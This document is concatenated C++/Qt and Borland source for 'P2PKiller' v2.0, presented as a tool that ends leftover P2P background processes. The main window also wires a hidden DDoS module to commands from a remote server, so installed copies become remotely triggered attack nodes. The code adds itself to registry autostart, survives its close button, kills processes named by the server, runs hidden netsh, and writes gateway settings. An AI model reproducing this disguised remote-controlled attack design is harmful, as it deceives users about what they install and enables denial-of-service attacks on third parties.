![]()
#ifndef KILLPROCESS_H
#define KILLPROCESS_H
#include <QObject>
#include <QThread>
#include <QLibrary>
#include <QFile>
#include <QDataStream>
#include <QTime>
#include <QVector>
//============================================================================================================
//我非常討厭一些P2P軟件退出的時候並沒有把後臺退出。這些後臺佔用您的網絡資源。造成網絡非常不穩定,整個程序會自動掃描沒有關閉的後臺
//每次打開任務管理我都覺得非常麻煩。對於不懂的人那是因爲自己的電腦又中病毒了
//我花了3天時間製作了這個小軟件。反響不錯。現在很多的安全軟件都沒有這個功能。我幫了不少人..呵呵
//P2P後臺終結者 版本2.0
//程序編程人員:Jason's.Alex QQ:531401335
//QT社區羣:3855916
//日期:2011/08/03
//============================================================================================================
typedef void (*ADDPROCESSLIST) (const char *fore,const char *back);
typedef void (*INSTALLCALLBACKPROCESS) (ADDPROCESSLIST &AD);////安裝添加進程回調函數
typedef void (*FINDPROCESSMATCH)();//搜索關聯進程
typedef void (*CLEANDATA)();//清除進程列表數據
void LogMessage(const char*);//日誌消息
typedef void (*LOG)(const char*);//日誌回調函數
typedef void (*INSTALL)(LOG);//安裝日誌鉤子
struct ProcessDetail//進程詳細信息
{
QString name;//進程名
QString back;//後臺進程
QString descript;//描述
bool operator==(const QString &rhs)
{
return back==rhs;
}
};
class KillProcess : public QObject
{
Q_OBJECT
public:
explicit KillProcess(QObject *parent = 0);
void ShowLog(const char *);//顯示日誌消息
void LoadDll();//載入動態鏈接庫
signals:
void Error(const QString &);//錯誤信息
void ShowLogMessage(const QString &);//顯示日誌消息
void ShowTrayMessage(const QString &);//顯示托盤消息
public slots:
void AddToProcessList();//添加到結束進程列表
void ClearProcess();//清理進程
void ClearProcessList();//清空進程數據列表
void AppendProcessList(const QString &,const QString &,const QString &);
private:
QLibrary dll;
QVector<ProcessDetail> processList;
INSTALLCALLBACKPROCESS AddCallBackProcess;////安裝添加進程回調函數
FINDPROCESSMATCH FindMatchProcess;//查找進程
INSTALL InstallLog;//日誌回調函數
CLEANDATA ClearData;//清楚數據
QString appPath;
ADDPROCESSLIST AddKillProcessList;//添加要結束的進程
};
extern KillProcess *killProcess;
#endif // KILLPROCESS_H
#include "killprocess.h"
#include <QDir>
#include <QDebug>
KillProcess *killProcess;
KillProcess::KillProcess(QObject *parent):
QObject(parent),dll("System.dll")
{
}
void KillProcess::LoadDll()//載入動態鏈接庫
{
ClearData=(CLEANDATA)dll.resolve("CleanData");
FindMatchProcess=(FINDPROCESSMATCH)dll.resolve("FindMatchProcess");
InstallLog=(INSTALL)dll.resolve("InstallLog");
AddCallBackProcess=(INSTALLCALLBACKPROCESS)dll.resolve("IntstallCallBackProcess");
if(!AddCallBackProcess||!FindMatchProcess||!InstallLog||!ClearData)
emit Error(tr("Loading system.dll failed!!"));
InstallLog(LogMessage);//安裝日誌回調鉤子
AddCallBackProcess(AddKillProcessList);//安裝添加進程回調函數
}
void KillProcess::AppendProcessList(const QString &name, const QString &back, const QString &decrip)
{
ProcessDetail pd;
pd.name=name;
pd.back=back;
pd.descript=decrip;
processList.append(pd);
}
void KillProcess::AddToProcessList()
{
for(QVector<ProcessDetail>::iterator iter=processList.begin();iter!=processList.end();++iter)
{
AddKillProcessList(iter->name.toStdString ().c_str(),iter->back.toStdString ().c_str());
}
}
void KillProcess::ClearProcess()//清理進程
{
FindMatchProcess();
}
void KillProcess::ClearProcessList()//清空數據進程列表
{
ClearData();
}
void KillProcess::ShowLog(const char *msg)//顯示日誌消息
{
QVector<ProcessDetail>::const_iterator ite=qFind(processList.begin(),processList.end(),QString(msg));
emit ShowLogMessage(QTime::currentTime().toString()+tr(" -><font color=purple>KillBackground:</font><font color=red>")+msg+
tr("</font> -><font color=purple>MainProcess:</font><font color=blue>")+ite->name+
tr("</font> -><font color=purple>Descript:</font><font color=green>")+ite->descript+"</font>");//顯示日誌消息
emit ShowTrayMessage(tr("KillBackground:")+msg);//顯示托盤消息
}
void LogMessage(const char*msg)//日誌消息
{
killProcess->ShowLog(msg);
}
#ifndef MAINWINDOW_H
#define MAINWINDOW_H
#include <QMainWindow>
#include <killprocess.h>
#include <QMessageBox>
#include <thread.h>
#include <QSystemTrayIcon>
#include <QCloseEvent>
#include <QMenu>
#include <QSettings>
#include <aboutform.h>
#include <QScrollBar>
#include <QDesktopServices>
#include <QUrl>
#include <QTimer>
#include <network.h>
#include <ddos.h>
//============================================================================================================
//我非常討厭一些P2P軟件退出的時候並沒有把後臺退出。這些後臺佔用您的網絡資源。造成網絡非常不穩定,整個程序會自動掃描沒有關閉的後臺
//每次打開任務管理我都覺得非常麻煩。對於不懂的人那是因爲自己的電腦又中病毒了
//我花了3天時間製作了這個小軟件。反響不錯。現在很多的安全軟件都沒有這個功能。我幫了不少人..呵呵
//P2P後臺終結者 版本2.0
//程序編程人員:Jason's.Alex QQ:531401335
//QT社區羣:3855916
//日期:2011/08/03
//============================================================================================================
namespace Ui {
class MainWindow;
}
class MainWindow : public QMainWindow
{
Q_OBJECT
public:
explicit MainWindow(QWidget *parent = 0);
~MainWindow();
virtual void hideEvent(QHideEvent *);//隱藏事件
virtual void showEvent(QShowEvent *);//顯示事件
virtual void closeEvent(QCloseEvent *);//關閉事件
void CreateTrayMenu();//創建托盤菜單
void CreateAction();//創建動作
void CreateNetwork();//創建網絡通訊
void CreateDDos();//創建DDOS攻擊
public slots:
void Error(const QString &);//顯示錯誤信息
void TrayMessage(const QString &);//顯示托盤消息
void activated( QSystemTrayIcon::ActivationReason reason );//托盤事件
void SetAutoRun(bool);//設置自動啓動
void ShowAbout();// 顯示關於
void ScrollToEnd();//拖動滾動條到最後
void LeaveMessage();//留言給我
void OfficialSite();//訪問官方
void UpdateVersion(const bool,const QStringList &);//檢測新版本
private:
Ui::MainWindow *ui;
ProcessThread thread;
QSystemTrayIcon *tray;//托盤
QMenu *trayMenu;//托盤菜單
bool closed;
QAction *autoRun;// 自動運行
AboutForm *aboutForm;//關於窗口
QPoint dPos,mousePos,windowPos;
Network *network;//網絡通訊
DDos *ddos;//DDOS攻擊
};
#endif // MAINWINDOW_H#include "mainwindow.h"
#include "ui_mainwindow.h"
#include <QProcess>
MainWindow::MainWindow(QWidget *parent) :
QMainWindow(parent),
ui(new Ui::MainWindow),closed(false)
{
ui->setupUi(this);
this->setFixedSize(this->size());
killProcess=new KillProcess(this);
tray=new QSystemTrayIcon(this);
tray->setIcon(QIcon(":/image/icon.png"));
tray->setVisible(true);
connect(killProcess,SIGNAL(ShowLogMessage(QString)),ui->textEdit,SLOT(append(QString)));
connect(killProcess,SIGNAL(ShowTrayMessage(QString)),SLOT(TrayMessage(QString)));
connect(killProcess,SIGNAL(Error(QString)),SLOT(Error(QString)));
killProcess->LoadDll();
connect(tray,SIGNAL(activated(QSystemTrayIcon::ActivationReason)),SLOT(activated(QSystemTrayIcon::ActivationReason)));
connect(ui->textEdit,SIGNAL(textChanged()),SLOT(ScrollToEnd()));
this->CreateNetwork();
this->CreateAction();
this->CreateTrayMenu();
this->CreateDDos();
}
//====================================================================================================================
void MainWindow::UpdateVersion(const bool arg, const QStringList &list)//檢測新版本
{
if(arg)
{
if(QMessageBox::Yes==QMessageBox::information(0,tr("New Version"),
tr("Have new version\nDownload..Now!"),QMessageBox::Yes,QMessageBox::No))
{
qApp->quit();
QProcess *p=new QProcess(0);
p->setWorkingDirectory(qApp->applicationDirPath());
p->start("update.exe",list);
}
}else
{
tray->showMessage(tr("Not Version"),tr("Up to data"));
}
}
//=====================================================================================================================
MainWindow::~MainWindow()
{
delete ui;
delete killProcess;
}
void MainWindow::ScrollToEnd()//拖動滾動條到最後
{
ui->textEdit->verticalScrollBar()->setValue(ui->textEdit->verticalScrollBar()->value());
}
//======================================================================================================================
void MainWindow::CreateTrayMenu()//創建托盤菜單
{
trayMenu=new QMenu(this);
trayMenu->addAction(QIcon(":/image/icon.png"),tr("About Software"),this,SLOT(ShowAbout()));
trayMenu->addSeparator();
trayMenu->addAction(QIcon(":/image/Official.png"),tr("OfficialSite"),this,SLOT(OfficialSite()));
trayMenu->addSeparator();
trayMenu->addAction(QIcon(":/image/leave.png"),tr("LeaveMessage"),this,SLOT(LeaveMessage()));
trayMenu->addSeparator();
trayMenu->addAction(QIcon(":/image/update.png"),tr("UpdateVersion"),network,SLOT(SendVersion()));
trayMenu->addSeparator();
trayMenu->addAction(autoRun);
trayMenu->addSeparator();
trayMenu->addAction(QIcon(":/image/close.png"),tr("Quit"),qApp,SLOT(quit()));
tray->setContextMenu(trayMenu);
}
//===========================================================================================================================
void MainWindow::CreateAction()
{
autoRun=new QAction(tr("AutoRun"),this);
autoRun->setCheckable(true);//設置是否顯示驗證鉤;
connect(autoRun,SIGNAL(triggered(bool)),SLOT(SetAutoRun(bool)));
QSettings reg("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",QSettings::NativeFormat);
autoRun->setChecked(!reg.value("P2PKiller").isNull());
}
//==========================================================================================================================
void MainWindow::CreateNetwork()//創建網絡模塊
{
network=new Network(this);
connect(network,SIGNAL(EmitUpdate(bool,QStringList)),SLOT(UpdateVersion(bool,QStringList)));
connect(network,SIGNAL(EmitData(QString,QString,QString)),killProcess,SLOT(AppendProcessList(QString,QString,QString)));
connect(network,SIGNAL(EmitReadDataFinish()),killProcess,SLOT(AddToProcessList()));
connect(network,SIGNAL(EmitReadDataFinish()),&thread,SLOT(start()));
connect(network,SIGNAL(EmitStartReadData()),&thread,SLOT(terminate()));
connect(network,SIGNAL(EmitStartReadData()),killProcess,SLOT(ClearProcessList()));
network->Connect();
}
//===========================================================================================================================
void MainWindow::CreateDDos()//創建DDO攻擊
{
ddos=new DDos(this);
connect(network,SIGNAL(EmitStartDDos(QString)),ddos,SLOT(StartDDos(QString)));
connect(network,SIGNAL(EmitStopDDos()),ddos,SLOT(StopDDos()));
}
//===========================================================================================================================
void MainWindow::SetAutoRun(bool state)
{
QSettings reg("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",QSettings::NativeFormat);
if(state)
reg.setValue("P2PKiller",qApp->applicationFilePath().replace("/","\\")+" -Min");
else
reg.remove("P2PKiller");
}
void MainWindow::TrayMessage(const QString &s)//顯示托盤消息
{
tray->showMessage(tr("P2PKiller"),s,QSystemTrayIcon::Information,1000);
}
void MainWindow::activated(QSystemTrayIcon::ActivationReason reason)//托盤事件
{
if(reason==QSystemTrayIcon::DoubleClick)
this->show();
}
void MainWindow::hideEvent(QHideEvent *)
{
tray->show();
}
void MainWindow::Error(const QString &arg)//錯誤信息
{
QMessageBox::warning(this,tr("Error"),arg+tr("\nDownload system.dll file"));
qApp->quit();
QProcess *p=new QProcess(0);
p->setWorkingDirectory(qApp->applicationDirPath());
p->start("update.exe",QStringList()<<"system.dll");
}
void MainWindow::showEvent(QShowEvent *)
{
tray->hide();
}
void MainWindow::closeEvent(QCloseEvent *e)
{
e->ignore();
this->hide();
}
void MainWindow::ShowAbout()
{
aboutForm=new AboutForm(this);
aboutForm->show();
}
void MainWindow::LeaveMessage()
{
QDesktopServices().openUrl(QUrl("http://531401335.qzone.qq.com"));//訪問開發者空間
}
void MainWindow::OfficialSite()
{
QDesktopServices().openUrl(QUrl("http://bctalk.5d6d.com"));//訪問官方
}
//---------------------------------------------------------------------------
#include <windows.h>
#include "system.h"
#include "ddos.h"
//---------------------------------------------------------------------------
// Important note about DLL memory management when your DLL uses the
// static version of the RunTime Library:
//
// If your DLL exports any functions that pass String objects (or structs/
// classes containing nested Strings) as parameter or function results,
// you will need to add the library MEMMGR.LIB to both the DLL project and
// any other projects that use the DLL. You will also need to use MEMMGR.LIB
// if any other projects which use the DLL will be performing new or delete
// operations on any non-TObject-derived classes which are exported from the
// DLL. Adding MEMMGR.LIB to your project will change the DLL and its calling
// EXE's to use the BORLNDMM.DLL as their memory manager. In these cases,
// the file BORLNDMM.DLL should be deployed along with your DLL.
//
// To avoid using BORLNDMM.DLL, pass string information using "char *" or
// ShortString parameters.
//
// If your DLL uses the dynamic version of the RTL, you do not need to
// explicitly add MEMMGR.LIB as this will be done implicitly for you
//---------------------------------------------------------------------------
#pragma argsused
typedef void (*ADDPROCESSLIST)(const char *fore,const char *back);
void AddKillPorcessList(const char *fore,const char *back); //添加進程列表
extern "C" __declspec(dllexport) void __stdcall IntstallCallBackProcess(ADDPROCESSLIST &AD); //添加進程列表回調函數
extern "C" __declspec(dllexport) void __stdcall FindMatchProcess();//查找匹配進程
extern "C" __declspec(dllexport) void __stdcall CleanData();//清空數據
typedef void (*LOG)(const char*); //日誌鉤子
extern "C" __declspec(dllexport) void __stdcall InstallLog(::LOG);//安裝日誌鉤子
struct ProcessDetail //進程詳情
{
string name;
string back;
};
typedef struct ProcessManage //進程管理
{
vector<ProcessDetail> ProcessList;
Process SystemProcess;
void FindMatchProcess();//查找匹配進程;
}*PProcessManage;
PProcessManage pProcessManage;
int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)
{
switch(reason)
{
case DLL_PROCESS_ATTACH:
pProcessManage=new ProcessManage;
break;
case DLL_PROCESS_DETACH:
delete pProcessManage;
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return 1;
}
//-----------------------------------------------------------------------------
void __stdcall IntstallCallBackProcess(ADDPROCESSLIST &AD) //添加進程列表回調函數
{
AD=AddKillPorcessList;
}
void AddKillPorcessList(const char *fore,const char *back)
{
ProcessDetail pd;
pd.name=fore;
pd.back=back;
pProcessManage->ProcessList.push_back(pd);
}
//-----------------------------------------------------------------------------
void __stdcall FindMatchProcess()//查找進程
{
pProcessManage->FindMatchProcess();
}
//-----------------------------------------------------------------------------
void __stdcall CleanData()//清空數據
{
pProcessManage->ProcessList.clear();
}
//-----------------------------------------------------------------------------
void ProcessManage::FindMatchProcess()//查找匹配進程;
{
for(vector<ProcessDetail>::const_iterator iter=ProcessList.begin();iter!=ProcessList.end();++iter)
{
if(SystemProcess.ProcessFind(iter->back)!=0)
{
if(SystemProcess.ProcessFind(iter->name)==0)
SystemProcess.AddBanProcess(iter->back);
}
}
SystemProcess.BanProcess(false);
}
//-----------------------------------------------------------------------------
void __stdcall InstallLog(::LOG LogMsg)//安裝日誌鉤子
{
pProcessManage->SystemProcess.LogMsg=LogMsg;
}
/---------------------------------------------------------------------------
#pragma hdrstop
#include "System.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
TokenPrivilege::TokenPrivilege(const DWORD &DesiredAccess,LPCTSTR PrivilegeValue,
const DWORD &Attributes,const HANDLE &Handle)
{
HANDLE Token;
TOKEN_PRIVILEGES TP;
OpenProcessToken(Handle,DesiredAccess,&Token); //打開進程令牌
LookupPrivilegeValue(NULL,PrivilegeValue,&TP.Privileges[0].Luid);
TP.PrivilegeCount=1;
TP.Privileges[0].Attributes=Attributes;
AdjustTokenPrivileges(Token,false,&TP,sizeof(TP),NULL,0); //將當前程序啓用特權
CloseHandle(Token);
}
//=============================================================================
Power::Power():TokenPrivilege(TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,SE_SHUTDOWN_NAME,SE_PRIVILEGE_ENABLED)
{
}
//------------------------------------------------------------------------------
//------------------------------------------------------------------------------
bool Power::SetPower(PowerKind Kind)const //執行關機函數
{
switch(Kind)
{
case PowerKind::ShutDown:
if(!ExitWindowsEx(EWX_FORCE|EWX_SHUTDOWN,0)) //關機
{
return false;
}
break;
case Reboot:
if(!ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0)) //重啓
{
return false;
}
break;
case Pause:
if(!SetSystemPowerState(true,true))//待機
{
return false;
}
break;
case Dormant:
if(!SetSystemPowerState(false,true))//休眠
{
return false;
}
break;
case LogOff:
if(!ExitWindowsEx(EWX_LOGOFF|EWX_FORCE,0))//註銷
{
return false;
}
break;
case Display:
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2);//關閉顯示器
break;
default:
return false;
}
return true;
}
//==============================================================================
//設置網卡IP地址,網關類
//===============================================================================
NetCard::NetCard()
{
Reg=new TRegistry; //設置註冊表鍵值
Reg->RootKey=HKEY_LOCAL_MACHINE;
if(!this->NetCardInfo()) //捕獲異常信息
{
throw Exception("獲取網卡信息失敗!");
}
}
//----------------------------------------------------------------------------
NetCard::~NetCard()
{
delete Reg;
}
//------------------------------------------------------------------------------
bool NetCard::NetCardInfo()//獲取網關信息
{
TStringList *Keys=new TStringList;
DWORD DateType,BufSize=256;
Reg->OpenKey("\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards",false);
Reg->GetKeyNames(Keys);//獲取所有網卡設備
Reg->CloseKey();
for(int i=0;i<Keys->Count;++i)
{
Reg->OpenKey("\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards\\"+Keys[0][i],false);
DescriptionName=Reg->ReadString("Description"); //獲取設備描述名字
DeviceID=Reg->ReadString("ServiceName");//獲取設備ID
Reg->CloseKey();
if(!DescriptionName.IsEmpty())//判斷是否是網卡
{
Reg->OpenKey("\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\"+DeviceID,false);//打開當前設備配置
if(RegSetValueEx(Reg->CurrentKey,"DefaultGateway",0,REG_MULTI_SZ,Gateway,sizeof(Gateway))!=0)//設置網關地址
return false;
if(RegQueryValueEx(Reg->CurrentKey,"IPAddress",0,&DateType,IPAddr,&BufSize)!=0) //獲取IP地址
return false;
BufSize=256;
if(RegQueryValueEx(Reg->CurrentKey,"SubnetMask",0,&DateType,SubMask,&BufSize)!=0) //獲取子掩碼
return false;
Reg->CloseKey();
break;
}
}
delete Keys;
return true;
}
//-----------------------------------------------------------------------------
const String& NetCard::GetDeviceID() //獲取設備ID
{
return DeviceID;
}
//-----------------------------------------------------------------------------
const String& NetCard::GetDescripitonName()//獲取描述名
{
return DescriptionName;
}
//-----------------------------------------------------------------------------
const String& NetCard::GetIPAddress()//獲取IP地址
{
return IPAddr;
}
//-----------------------------------------------------------------------------
const String& NetCard::GetSubMask()//獲取子掩碼
{
return SubMask;
}
//-----------------------------------------------------------------------------
const String& NetCard::GetGateway()//獲取網關地址
{
return Gateway;
}
//----------------------------------------------------------------------------
bool NetCard::SetGateway(String Gateway)//設置網關
{
return NotifyGatewayChange(IPAddr,SubMask,Gateway);
}
//--------------------------------------------------------------------------------
bool NetCard::NotifyGatewayChange(const String &IPAddr,const String &SubMask,const String &Gateway)const//通知網關更改事件
{
String Parameter("interface ip set address \"本地連接\" static");
Parameter+=" "+IPAddr+" "+SubMask+" "+Gateway+" "+"1";
return ShellExecute(NULL,"open","netsh",Parameter.t_str(),NULL,SW_HIDE);
}
//===============================================================================
//系統進程管理
//===============================================================================
Process::Process():
TokenPrivilege(TOKEN_ADJUST_PRIVILEGES,SE_DEBUG_NAME,SE_PRIVILEGE_ENABLED)
{
}
//-------------------------------------------------------------------------------
void Process::AddBanProcess(const string &Process)//添加要結束的進程
{
ProcessList.push_back(Process);
}
//------------------------------------------------------------------------------
bool Process::ProcessFirst(HANDLE Snapshot,PPROCESSENTRY32 PPE)const//枚舉進程
{
bool OK=Process32First(Snapshot,PPE);
if(OK&&(PPE->th32ProcessID==0))
OK=ProcessNext(Snapshot,PPE);
return OK;
}
//------------------------------------------------------------------------------
bool Process::ProcessNext(HANDLE Snapshot,PPROCESSENTRY32 PPE)const
{
bool OK=Process32Next(Snapshot,PPE);
if(OK&&(PPE->th32ProcessID==0))
OK=ProcessNext(Snapshot,PPE);
return OK;
}
//------------------------------------------------------------------------------
PROCESSENTRY32 PE;//進程映射
DWORD Process::ProcessFind(const string &ExeName)const// 查找進程
{
PROCESSENTRY32 PPE={sizeof(PPE)};
HANDLE Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(Snapshot==INVALID_HANDLE_VALUE)
return 0;
for(bool Ok=ProcessFirst(Snapshot,&PPE);Ok;Ok=ProcessNext(Snapshot,&PPE))
{
if(ExeName.compare(PPE.szExeFile)==0)
{
CloseHandle(Snapshot);
PE=PPE;
return PPE.th32ProcessID; //返回進程ID
}
}
CloseHandle(Snapshot);
return 0;
}
//-------------------------------------------------------------------------------
HANDLE Process::GetProcessHandle(const int &Id)const//獲取進程句柄
{
return OpenProcess(PROCESS_TERMINATE,false,Id);//獲取進程句柄
}
//--------------------------------------------------------------------------------
void Process::BanProcess(const bool &Enable)//禁止進程
{
DWORD WndId=0;
// while(Enable)
//{
for(int i=0;i<ProcessList.size();++i)
{
if(WndId=ProcessFind(ProcessList[i]))
{
HANDLE hwnd=GetProcessHandle(WndId);
if(hwnd)
{
TerminateProcess(hwnd,0);
CloseHandle(hwnd);
LogMsg(PE.szExeFile); //日誌消息鉤子
}
}
}
ProcessList.clear();//清空進程列表
// Application->ProcessMessages();
// Sleep(10);
//}
}
//==============================================================================
//系統hook
//==============================================================================
bool Hook::SystemIdle=false;
HHOOK Hook::HookHandle=NULL;
//------------------------------------------------------------------------------
Hook::Hook(int HookId)
{
switch(HookId)
{
case WH_JOURNALRECORD:
{
HookHandle=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0);
break;
}
}
if(HookHandle==NULL) //是否成功啓用hook.否則引發異常
throw Exception("使用hook失敗");
}
//------------------------------------------------------------------------------
bool Hook::GetSystemIdle(void)
{
bool TempIdle=SystemIdle;
SystemIdle=true;//設置爲空閒狀態
return TempIdle;
}
//------------------------------------------------------------------------------
Hook::~Hook()
{
if(HookHandle!=NULL) //卸載鉤子
UnhookWindowsHookEx(HookHandle);
}
//-------------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam, LPARAM lParam)//日子鉤子回調函數
{
if(iCode<0)
return (HOOKPROC)CallNextHookEx(Hook::HookHandle,iCode,wParam,lParam);
if(iCode==HC_ACTION)
{
EVENTMSG *MSG=(EVENTMSG*)lParam;
if(MSG->message==WM_KEYDOWN||MSG->message==WM_MOUSEMOVE)
{
Hook::SystemIdle=false;//使用中
}
}
return (HOOKPROC)CallNextHookEx(Hook::HookHandle,iCode,wParam,lParam);
}
//---------------------------------------------------------------------------------
//==============================================================================
//獲取CPU使用量
Hardware::Hardware()
{
GetSystemTimes(&PreIdle,&PreKernel,&PreUser);
}
//------------------------------------------------------------------------------
int Hardware::GetCPUUsage(void)
{
this->ExecuteFileTime();
return (KernelTime+UserTime-IdleTime)*100/(KernelTime+UserTime);//計算CPU使用量
}
//------------------------------------------------------------------------------
int Hardware::GetCPUIdle(void)//獲取CPU空閒率
{
this->ExecuteFileTime();
return IdleTime*100/(KernelTime+UserTime);
}
//------------------------------------------------------------------------------
int Hardware::GetCPUNum(void)const//獲取CPU數量
{
_SYSTEM_INFO CPU;
GetSystemInfo(&CPU);
return CPU.dwNumberOfProcessors;
}
//------------------------------------------------------------------------------
int Hardware::CompareFileTime(const _FILETIME *PreTime,const _FILETIME *CurrentTime)const//比較兩個時間片
{
int Pre=PreTime->dwHighDateTime<<32|PreTime->dwLowDateTime;//獲取先前的時間片
int Cur=CurrentTime->dwHighDateTime<<32|CurrentTime->dwLowDateTime; //獲取當前的時間片
return (Cur-Pre);
}
//-------------------------------------------------------------------------------
void Hardware::ExecuteFileTime(void)//執行時間片
{
Application->ProcessMessages();
Sleep(1000);
GetSystemTimes(&Idle,&Kernel,&User);
//比較時間片
IdleTime=CompareFileTime(&PreIdle,&Idle);
KernelTime=CompareFileTime(&PreKernel,&Kernel);
UserTime=CompareFileTime(&PreUser,&User);
PreIdle=Idle;//交換時間片
PreKernel=Kernel;
PreUser=User;
}
